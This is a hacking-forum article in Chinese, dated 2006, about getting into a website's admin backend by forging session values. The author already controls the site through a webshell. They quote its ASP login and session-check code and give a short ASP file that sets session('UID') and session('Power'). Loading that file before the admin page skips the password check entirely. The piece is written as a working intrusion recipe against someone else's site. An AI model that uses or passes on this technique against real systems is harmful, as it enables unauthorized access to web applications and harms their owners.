伪造Session登陆后台 - 华夏黑客同盟

| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 |

服务导航

我要发布

主力频道

精华收集

光盘刻录

您现在的位置：华夏黑客同盟 >> Hack >> 黑客入侵 >> 正文

用户登录

新用户注册

伪造Session登陆后台

热荐 ★★★

【字体：小大】

伪造Session登陆后台

作者：未知文章来源：华盟收集点击数：更新时间：2006-8-8

前不久拿到一个站webshell

发现里面有个站程序还不错..可密码一直找不到..
看登陆验证代码的时候就想是否可以修改代码..绕过验证访问后台呢..记的以前nowthk教过我..可怜我这个记性啊..给忘了..又请教了下nowthk...

login.asp的验证代码

<% dim user_name,user_password,upwr,uID,ukey,cmd,rs
   user_name=trim(request.form("uid"))
   user_password=trim(request.form("pwd"))
   user_password=jk_md5(user_password,"long")
if user_name="" or user_password="" then
   close_conn
   response.redirect "../global/systeminfo.asp?flag=1"
end if
如果用户和密码为空就返回global/systeminfo.asp?flag=1  这个页面提示"错误帐号或密码，请重新登陆"
在往下看代码

session("UID")=rs("UserName")
   session("power")=rs("Power")
   Session("PSW")=rs("PSW")
   rs.close:set rs=Nothing
   set cmd=Nothing
   close_conn
   response.redirect("../system/default.asp")

如果UID,,power.PSW不为空就返回system/default.asp登陆成功

checkuser.asp代码为
<%

if session("UID")="" then
   response.redirect "../gobal/systeminfo.asp?flag=1"
   response.end
end if
%>

session("UID")为空同样返回gobal/systeminfo.asp?flag=1
那也就是说只要UID参数不为空就登陆成功

然后把以下代码保存为1.asp

<%
session("UID")="1"
Session("Power")="1"
%>

先访问1.asp..然后再访问后台system/default.asp..绕过了验证..看到了后台管理页面

记录下..省的以后又忘记了

责任编辑：华夏编辑6　　联系方式　Email：华夏编辑6

电话：51228163

上一篇黑客：网站挂马奈我何

下一篇黑客：菜菜入侵问题面对面

【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

姓名：	* 游客填写　·注册用户
主页：
评分：	1分 2分 3分 4分 5分
评论内容：
验证码： *

请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论。用户需对自己在使用本站服务过程中的行为承担法律责任（直接或间接导致的）。本站管理员有权保留或删除评论内容。评论内容只代表网友个人观点，与本网站立场无关。

最新hack更新

最新推荐资讯

最新会员软件

最新推荐视频

最新推荐动画

mailto:webmaster@77169.net
咨询QQ号:836982 / 59280880
联系站长 QQ38588913